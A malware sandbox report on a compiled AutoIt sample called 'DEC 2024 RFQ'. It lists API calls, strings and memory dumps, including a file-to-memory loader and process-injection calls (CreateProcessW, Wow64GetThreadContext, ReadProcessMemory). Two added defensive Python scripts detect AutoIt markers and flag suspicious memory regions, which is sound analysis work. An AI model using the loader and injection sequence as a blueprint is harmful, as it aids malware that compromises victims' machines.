                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: 08fb0c49be15cec27751497bb6aa02b34d7e62a23ef1a241ea928725f3cbecec
                                                                                                                      • Instruction ID: 25f23b734209bc0a7902d8836f3ee58853f85ee65904dfd9cd438abc27c0ed42
                                                                                                                      • Opcode Fuzzy Hash: 08fb0c49be15cec27751497bb6aa02b34d7e62a23ef1a241ea928725f3cbecec
                                                                                                                      • Instruction Fuzzy Hash: 15313AB1844746DFEB108FE4EC85ADDBBF0FB0A715F14452AE580EA2A0E7B90585CF51

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00023074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 0002309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000230AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 000230CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000230DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 000230F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00023101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: 21f560c4b78c1b9b4e8bf03b1d1fb1abee492685fc31d7faa8ffe8b0f3b99902
                                                                                                                      • Instruction ID: b23462577d109e71c1c95deaba9714efc183c130fb862fce0dbbcc4a440a4244
                                                                                                                      • Opcode Fuzzy Hash: 21f560c4b78c1b9b4e8bf03b1d1fb1abee492685fc31d7faa8ffe8b0f3b99902
                                                                                                                      • Instruction Fuzzy Hash: CE21E8B1900659AFEB00DFD4ED88BEDBBF4FB09705F00452AF610BA2A0D7B945448F91

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,000E52F8,?,000237AE,?), ref: 00024724
                                                                                                                        • Part of subcall function 0004050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00027165), ref: 0004052D
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000271A8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0005E8C8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0005E909
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0005E947
                                                                                                                      • _wcscat.LIBCMT ref: 0005E9A0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                      • API String ID: 2673923337-2727554177
                                                                                                                      • Opcode ID: abb3a5e83057e8a5e433c01ed2e05de8744c6dbef03e3a811acf47e044c05a23
                                                                                                                      • Instruction ID: c166e73eed0a5cb648113bd9a842795d6056b920570ef39826f4aed90b59b8ad
                                                                                                                      • Opcode Fuzzy Hash: abb3a5e83057e8a5e433c01ed2e05de8744c6dbef03e3a811acf47e044c05a23
                                                                                                                      • Instruction Fuzzy Hash: 4C71CF715083519ED304EF65FC819AFBBE8FF94750F40052EF644AB1A1DB369948CB92

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00023A50
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00023A5F
                                                                                                                      • LoadIconW.USER32(00000063), ref: 00023A76
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00023A88
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00023A9A
                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00023AC0
                                                                                                                      • RegisterClassExW.USER32(?), ref: 00023B16
                                                                                                                        • Part of subcall function 00023041: GetSysColorBrush.USER32(0000000F), ref: 00023074
                                                                                                                        • Part of subcall function 00023041: RegisterClassExW.USER32(00000030), ref: 0002309E
                                                                                                                        • Part of subcall function 00023041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000230AF
                                                                                                                        • Part of subcall function 00023041: InitCommonControlsEx.COMCTL32(?), ref: 000230CC
                                                                                                                        • Part of subcall function 00023041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000230DC
                                                                                                                        • Part of subcall function 00023041: LoadIconW.USER32(000000A9), ref: 000230F2
                                                                                                                        • Part of subcall function 00023041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00023101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                      • Opcode ID: 341844d3cf0b4e6c43dc4c59bd81cb03d463f913335fe5a82a09f14a193efcbd
                                                                                                                      • Instruction ID: 572e922ea706b394371e7038bc6604dd43b78b09535438f91d2a0959006749a4
                                                                                                                      • Opcode Fuzzy Hash: 341844d3cf0b4e6c43dc4c59bd81cb03d463f913335fe5a82a09f14a193efcbd
                                                                                                                      • Instruction Fuzzy Hash: 10214D70D04755AFFB10DFA4EC89B9D7BB4FB09B16F00052AF600BA2A1D3B955408F94

                                                                                                                      Control-flow Graph

                                                                                                                      • Control-flow graph (rendered image; legend: executed / not executed). Basic blocks 00023633-00023753 with out-of-line blocks 0005D06F-0005D16E; graph nodes call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus.
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 000236D2
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 000236FC
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0002371F
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0002372A
                                                                                                                      • CreatePopupMenu.USER32 ref: 0002373E
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0002374D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                      • String ID: TaskbarCreated
                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                      • Opcode ID: ae027da6f2299a75e28f20465d63f00f57bb2ac9df8416507c9328c890d26251
                                                                                                                      • Instruction ID: b23e29c513aca5cf71258e6ce3834503e6a94e27c3e06b6052121e3bca166bf0
                                                                                                                      • Opcode Fuzzy Hash: ae027da6f2299a75e28f20465d63f00f57bb2ac9df8416507c9328c890d26251
                                                                                                                      • Instruction Fuzzy Hash: BD41AFB1104955BBEF345F74FC4DBBE37D8E705301F10092AF646A62E2CA6D9E058321

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                      • API String ID: 1825951767-3513169116
                                                                                                                      • Opcode ID: 6228f57c5a2b8216ad3362c4445f7c15f872efc1cabb8e37270e3efd12d80ee3
                                                                                                                      • Instruction ID: 4b3403bc8d5ee9bce3bcf3401e05335ba0f062f1f90b5350f04ad7d172100393
                                                                                                                      • Opcode Fuzzy Hash: 6228f57c5a2b8216ad3362c4445f7c15f872efc1cabb8e37270e3efd12d80ee3
                                                                                                                      • Instruction Fuzzy Hash: C5A15E7190022DAADF15EBE0EC91EEEB778BF15300F44042AF515B7192DF785A08CB60
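The string IDs above ("/AutoIt3ExecuteScript", "/AutoIt3ExecuteLine", ">>>AUTOIT NO CMDEXECUTE<<<", "CMDLINERAW"), together with the "AutoIt v3 GUI" window class and the "Software\AutoIt v3\AutoIt" registry key resolved in the earlier functions, are the runtime markers behind the report's "Binary is likely a compiled AutoIt script file" signature. The following scanner is an added example, not part of the Joe Sandbox report and not AutoIt's own code: it looks for those markers as UTF-16LE strings (they are arguments to ...W APIs in the listing), requires two distinct hits before calling a buffer compiled AutoIt (a single generic switch such as "/ErrorStdOut" is not enough), and additionally checks for the widely documented "AU3!EA06" script magic, which this page does not show and is therefore labelled as an outside assumption. The sample buffer is constructed, not taken from the sample.

```python
r"""Scan a binary for the compiled-AutoIt v3 runtime markers listed in this report.

Added example, not part of the Joe Sandbox report or of AutoIt.  The wide-string
markers are the ones the report's API listing resolves; the "AU3!EA06" resource
magic is a widely documented marker that this page does not show (assumption).
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Wide (UTF-16LE) strings: each is an argument to a ...W API in the listing.
WIDE_MARKERS = (
    "AutoIt v3 GUI",                 # window class (RegisterClassExW)
    "Software\\AutoIt v3\\AutoIt",   # HKCU include-path key (RegOpenKeyExW)
    "/AutoIt3ExecuteScript",         # command-line switches of the runtime
    "/AutoIt3ExecuteLine",
    "/AutoIt3OutputDebug",
    "/ErrorStdOut",
    ">>>AUTOIT NO CMDEXECUTE<<<",
    "CMDLINERAW",
)
# ASCII marker not on this page (assumption: AutoIt3 compiled-script signature).
ASCII_MARKERS = (b"AU3!EA06",)


@dataclass
class Au3Scan:
    hits: dict[str, list[int]] = field(default_factory=dict)  # marker -> offsets

    @property
    def score(self) -> int:
        return len(self.hits)

    @property
    def verdict(self) -> str:
        # Two independent markers before calling it compiled AutoIt: a single
        # generic switch such as "/ErrorStdOut" is not evidence on its own.
        return "compiled AutoIt v3" if self.score >= 2 else "inconclusive"


def _offsets(needle: bytes, data: bytes) -> list[int]:
    return [m.start() for m in re.finditer(re.escape(needle), data)]


def scan_au3_markers(data: bytes) -> Au3Scan:
    """Return every marker found in `data` with its byte offsets."""
    result = Au3Scan()
    for text in WIDE_MARKERS:
        offs = _offsets(text.encode("utf-16-le"), data)
        if offs:
            result.hits[text] = offs
    for needle in ASCII_MARKERS:
        offs = _offsets(needle, data)
        if offs:
            result.hits[needle.decode()] = offs
    return result


def build_sample(markers: tuple[str, ...]) -> bytes:
    """Constructed stand-in for a binary: zero filler plus the given wide strings."""
    blob = bytearray(b"\x00" * 64)
    for text in markers:
        blob += text.encode("utf-16-le") + b"\x00\x00" + b"\x90" * 16
    return bytes(blob)


if __name__ == "__main__":
    sample = build_sample(("AutoIt v3 GUI", "Software\\AutoIt v3\\AutoIt"))
    scan = scan_au3_markers(sample)
    print(scan.verdict, sorted(scan.hits))
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `scan_au3_markers`; the offsets let you confirm the hit in a hex viewer before trusting the verdict. A compiled AutoIt stub is not malicious by itself, so the scanner classifies the packaging, not the payload.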

                                                                                                                      Control-flow Graph

                                                                                                                      • Control-flow graph (rendered image; legend: executed / not executed). Basic blocks 0173B800-0173BB02; graph nodes call CreateFileW, VirtualAlloc (twice), ReadFile, CloseHandle and VirtualFree (twice), with an edge from 0173BA1E back to the CreateFileW block at 0173B8B5, so the open/read sequence is looped.
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0173B8D1
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0173BAF7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                      • Instruction ID: 7876239874da981f014084619c890b9c6882c02ae833a4622ccf572afc7e5314
                                                                                                                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                      • Instruction Fuzzy Hash: 70A10970E00209EBDB14CFA4C894BEEFBB5FF88305F208199E605BB282D7759A41CB54
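This function lives in the 01739000 dump, which the report marks "based on PE: false": unlike the 00020000 module regions above it, the memory is not backed by a loaded image, and the function's CreateFileW / VirtualAlloc / ReadFile / VirtualFree sequence is a file-to-memory loader. The triage below is an added example, not part of the Joe Sandbox report: it parses the report's .sdmp file names and flags executable regions that are not MEM_IMAGE, with RWX first. The field layout is inferred from the values on this page and is an assumption (field 4 the base address, field 5 the page protection, field 7 the region type, all with Win32 MEMORY_BASIC_INFORMATION constant values); the four names in the list are copied from this report's "Memory Dump Source" entries.

```python
r"""Triage the "Memory Dump Source" entries of a Joe Sandbox report.

Added example, not part of the Joe Sandbox report.  The .sdmp field layout is
inferred from the values on this page and is an assumption: field 4 is the
region base, field 5 the page protection, field 7 the region type, with Win32
MEMORY_BASIC_INFORMATION constant values (0x40 PAGE_EXECUTE_READWRITE,
0x20000 MEM_PRIVATE, 0x01000000 MEM_IMAGE).
"""
from __future__ import annotations
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Mask off PAGE_GUARD / PAGE_NOCACHE modifiers (0x100 / 0x200) first.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def rwx(self) -> bool:
        base = self.protect & 0xFF
        return base in EXECUTABLE and base in WRITABLE

    @property
    def suspicious(self) -> bool:
        """Executable memory that is not backed by a loaded image (MEM_IMAGE)."""
        return (self.protect & 0xFF) in EXECUTABLE and self.mem_type != 0x1000000


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split '<proc>.<phase>.<id>.<base>.<protect>.<alloc>.<type>.<n>.sdmp'."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) < 7:
        raise ValueError(f"unexpected sdmp name: {name}")
    return DumpRegion(name=name, base=int(fields[3], 16),
                      protect=int(fields[4], 16), mem_type=int(fields[6], 16))


def triage(names: list[str]) -> list[DumpRegion]:
    """Return the regions worth opening first: non-image executable, RWX first."""
    flagged = [r for r in map(parse_sdmp_name, names) if r.suspicious]
    return sorted(flagged, key=lambda r: (not r.rwx, r.base))


# Copied from this report's "Memory Dump Source" entries.
REPORT_DUMPS = [
    "00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for r in triage(REPORT_DUMPS):
        print(f"{r.base:#010x} {r.protect_name:<24} {r.type_name}")
```

Run against the report's dump list, only the 01739000 region is flagged: executable, writable and private, which is exactly where the out-of-image loader functions at 0173B800 and 0173B5A0 were found. The same classification applies to live process memory if you feed it the Protect and Type fields from VirtualQueryEx instead of file names.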

                                                                                                                      Control-flow Graph

                                                                                                                      • Control-flow graph (rendered image; legend: executed / not executed). Single basic block 000239D5-00023A45 calling CreateWindowExW twice and ShowWindow twice.
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00023A03
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00023A24
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00023A38
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00023A41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399

Control-flow Graph: function 173b5a0-173b7be; API calls CreateFileW, VirtualAlloc, ReadFile, ExitProcess (block-level graph omitted)
APIs
  • Part of subcall function 0173B490: Sleep.KERNELBASE(000001F4), ref: 0173B4A1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0173B6F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: JCIIBUHN8VDSQ16BU9V0STN
• API String ID: 2694422964-3224443837

Control-flow Graph: function 2407c-2417d; API calls LoadStringW, Shell_NotifyIconW (block-level graph omitted)
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0005D3D7
  • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
• _memset.LIBCMT ref: 000240FC
• _wcscpy.LIBCMT ref: 00024150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00024160
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449

Control-flow Graph: function 4541d-455e0; internal calls only, no imported API calls (block-level graph omitted)
APIs
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
APIs
  • Part of subcall function 00024DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,000E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00024E0F
• _free.LIBCMT ref: 0005E263
• _free.LIBCMT ref: 0005E2AA
  • Part of subcall function 00026A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00026BAD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000235A1,SwapMouseButtons,00000004,?), ref: 000235D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000235A1,SwapMouseButtons,00000004,?,?,?,?,00022754), ref: 000235F5
• RegCloseKey.KERNELBASE(00000000,?,?,000235A1,SwapMouseButtons,00000004,?,?,?,?,00022754), ref: 00023617
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0173ACBD
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0173ACE1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0173AD03
Memory Dump Source
• Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
  • Part of subcall function 00024EE5: _fseek.LIBCMT ref: 00024EFD
  • Part of subcall function 00089734: _wcscmp.LIBCMT ref: 00089824
  • Part of subcall function 00089734: _wcscmp.LIBCMT ref: 00089837
• _free.LIBCMT ref: 000896A2
